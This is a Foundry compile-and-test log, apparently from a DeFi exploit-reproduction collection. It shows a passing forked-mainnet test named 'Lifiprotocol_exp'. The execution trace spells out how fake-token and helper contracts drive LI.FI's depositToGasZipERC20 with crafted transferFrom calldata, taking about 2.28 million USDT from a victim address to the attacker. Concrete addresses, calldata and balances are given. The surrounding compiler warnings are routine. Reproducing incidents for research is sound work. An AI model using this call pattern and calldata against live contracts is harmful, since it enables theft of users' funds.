Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/Lifiprotocol_exp.sol:35:5:
   |
35 |     WETH9 private constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/Lifiprotocol_exp.sol:36:5:
   |
36 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/Lifiprotocol_exp.sol:74:5:
   |
74 |     WETH9 private constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/Lifiprotocol_exp.sol:76:5:
   |
76 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2024-07/Lifiprotocol_exp.sol:109:5:
    |
109 |     WETH9 private constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2024-07/Lifiprotocol_exp.sol:111:5:
    |
111 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-07/Lifiprotocol_exp.sol:33:1:
   |
33 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-07/Lifiprotocol_exp.sol:69:5:
   |
69 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-07/Lifiprotocol_exp.sol:72:1:
   |
72 | contract Money is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-07/Lifiprotocol_exp.sol:104:5:
    |
104 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
   --> src/test/2024-07/Lifiprotocol_exp.sol:107:1:
    |
107 | contract Help is Test {
    | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-07/Lifiprotocol_exp.sol:129:5:
    |
129 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5159): "selfdestruct" has been deprecated. Note that, starting from the Cancun hard fork, the underlying opcode no longer deletes the code and data associated with an account and only transfers its Ether to the beneficiary, unless executed in the same transaction in which the contract was created (see EIP-6780). Any use in newly deployed contracts is strongly discouraged even if the new behavior is taken into account. Future changes to the EVM might further reduce the functionality of the opcode.
   --> src/test/2024-07/Lifiprotocol_exp.sol:126:9:
    |
126 |         selfdestruct(payable(msg.sender));
    |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/Lifiprotocol_exp.sol:89:9:
   |
89 |         address who
   |         ^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/Lifiprotocol_exp.sol:94:24:
   |
94 |     function allowance(address _owner, address spender) external view returns (uint256) {
   |                        ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/Lifiprotocol_exp.sol:94:40:
   |
94 |     function allowance(address _owner, address spender) external view returns (uint256) {
   |                                        ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/Lifiprotocol_exp.sol:98:22:
   |
98 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-07/Lifiprotocol_exp.sol:98:39:
   |
98 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                                       ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-07/Lifiprotocol_exp.sol:122:9:
    |
122 |         address who
    |         ^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2024-07/Lifiprotocol_exp.sol:124:24:
    |
124 |         (bool success, bytes memory retData) = address(Vulncontract).call{value: msg.value}("");
    |                        ^^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-07/Lifiprotocol_exp.sol:88:5:
   |
88 |     function balanceOf(
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-07/Lifiprotocol_exp.sol:94:5:
   |
94 |     function allowance(address _owner, address spender) external view returns (uint256) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 802.08ms (3.96ms CPU time)

Ran 1 test for src/test/2024-07/Lifiprotocol_exp.sol:ContractTest
[PASS] testExpolit() (gas: 5934246)
Logs:
  [Begin] Attacker USDT before exploit: 0.000000
  [End] Attacker USDT after exploit: 2276295.880553

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20318962 [2.031e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [5939046] ContractTest::testExpolit()
    ├─ [5031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2484] 0xdAC17F958D2ee523a2206206994597C13D831ec7::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 0, decimals: 6)
    ├─ [2841646] → new Money@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 31: 0 → 0x000000000000000000000087870bca3f3fd6335c3f4ce8392d69350b4fa4e201
    │   │   @ 38: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 12: 0 → 1
    │   │   @ 32: 0 → 0x0000000000000000000000007122985656e38bdc0302db86685bb972b145bd3c
    │   │   @ 33: 0 → 0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7
    │   │   @ 37: 0 → 0x000000000000000000000000f929ba2aeec16cffcfc66858a9434e194baaf80d
    │   │   @ 34: 0 → 0x0000000000000000000000001231deb6f5749ef6ce6943a275a1d3e7486f4eae
    │   │   @ 36: 0 → 0x000000000000000000000000abe45ea636df7ac90fb7d8d8c74a081b169f92ef
    │   │   @ 35: 0 → 0x0000000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d
    │   └─ ← [Return] 13195 bytes of code
    ├─ [3006433] 0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE::depositToGasZipERC20(SwapData({ callTo: 0xdAC17F958D2ee523a2206206994597C13D831ec7, approveTo: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, sendingAssetId: 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, receivingAssetId: 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, fromAmount: 1, callData: 0x23b872dd000000000000000000000000abe45ea636df7ac90fb7d8d8c74a081b169f92ef0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000211fdceaf69, requiresDeposit: true }), 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [3001431] 0xf28A352377663cA134bd27B582b1a9A4dad7e534::depositToGasZipERC20(SwapData({ callTo: 0xdAC17F958D2ee523a2206206994597C13D831ec7, approveTo: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, sendingAssetId: 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, receivingAssetId: 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, fromAmount: 1, callData: 0x23b872dd000000000000000000000000abe45ea636df7ac90fb7d8d8c74a081b169f92ef0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000211fdceaf69, requiresDeposit: true }), 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ [730] Money::balanceOf(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE) [staticcall]
    │   │   │   └─ ← [Return] 1
    │   │   ├─ [730] Money::balanceOf(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE) [staticcall]
    │   │   │   └─ ← [Return] 1
    │   │   ├─ [902] Money::allowance(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [1478478] Money::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   ├─ [1401286] → new Help@0x104fBc016F4bb334D775a19E8A6510109AC63E00
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 37: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   @ 34: 0 → 0x0000000000000000000000001231deb6f5749ef6ce6943a275a1d3e7486f4eae
    │   │   │   │   │   @ 36: 0 → 0x000000000000000000000000abe45ea636df7ac90fb7d8d8c74a081b169f92ef
    │   │   │   │   │   @ 35: 0 → 0x0000000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d
    │   │   │   │   │   @ 33: 0 → 0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7
    │   │   │   │   │   @ 31: 0 → 0x000000000000000000000087870bca3f3fd6335c3f4ce8392d69350b4fa4e201
    │   │   │   │   │   @ 32: 0 → 0x0000000000000000000000007122985656e38bdc0302db86685bb972b145bd3c
    │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   └─ ← [Return] 6112 bytes of code
    │   │   │   ├─ [12807] Help::sendto{value: 1}(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE)
    │   │   │   │   ├─ [33] 0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE::fallback{value: 1}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [SelfDestruct]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 39: 0 → 0x000000000000000000000000104fbc016f4bb334d775a19e8a6510109ac63e00
    │   │   │   └─ ← [Return] true
    │   │   ├─ [902] Money::allowance(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [1456578] Money::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [1401286] → new Help@0x037eDa3aDB1198021A9b2e88C22B464fD38db3f3
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   @ 36: 0 → 0x000000000000000000000000abe45ea636df7ac90fb7d8d8c74a081b169f92ef
    │   │   │   │   │   @ 33: 0 → 0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7
    │   │   │   │   │   @ 34: 0 → 0x0000000000000000000000001231deb6f5749ef6ce6943a275a1d3e7486f4eae
    │   │   │   │   │   @ 31: 0 → 0x000000000000000000000087870bca3f3fd6335c3f4ce8392d69350b4fa4e201
    │   │   │   │   │   @ 37: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   @ 32: 0 → 0x0000000000000000000000007122985656e38bdc0302db86685bb972b145bd3c
    │   │   │   │   │   @ 35: 0 → 0x0000000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d
    │   │   │   │   └─ ← [Return] 6112 bytes of code
    │   │   │   ├─ [12807] Help::sendto{value: 1}(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE)
    │   │   │   │   ├─ [33] 0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE::fallback{value: 1}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [SelfDestruct]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 39: 0x000000000000000000000000104fbc016f4bb334d775a19e8a6510109ac63e00 → 0x000000000000000000000000037eda3adb1198021a9b2e88c22b464fd38db3f3
    │   │   │   └─ ← [Return] true
    │   │   ├─ [39630] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transferFrom(0xABE45eA636df7Ac90Fb7D8d8C74a081b169F92eF, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2276295880553 [2.276e12])
    │   │   │   ├─ emit Transfer(from: 0xABE45eA636df7Ac90Fb7D8d8C74a081b169F92eF, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2276295880553 [2.276e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000000000000000211fdceaf69
    │   │   │   │   @ 0x82a012be0f33fffbd277b684d1a58b1e4beb67b3d7d686a655bad49c2663331c: 0x00000000000000000000000000000000000000000000000000000211fdceaf69 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [730] Money::balanceOf(0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE) [staticcall]
    │   │   │   └─ ← [Return] 1
    │   │   ├─ emit AssetSwapped(: 0x0000000000000000000000000000000000000000000000000000000000000000, : 0xdAC17F958D2ee523a2206206994597C13D831ec7, : Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], : Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], : 1, : 1, : 1721131583 [1.721e9])
    │   │   ├─ [2231] 0x9E22ebeC84c7e4C4bD6D4aE7FF6f4D436D6D8390::deposit{value: 2}(0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ emit Deposit(: 0x1231DEB6f5749EF6cE6943a275A1D3E7486F4EaE, : 0, : 2, : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2276295880553 [2.276e12]
    ├─ [484] 0xdAC17F958D2ee523a2206206994597C13D831ec7::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT after exploit", val: 2276295880553 [2.276e12], decimals: 6)
    ├─  storage changes:
    │   @ 36: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.36s (4.07s CPU time)

Ran 2 test suites in 6.51s (6.16s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
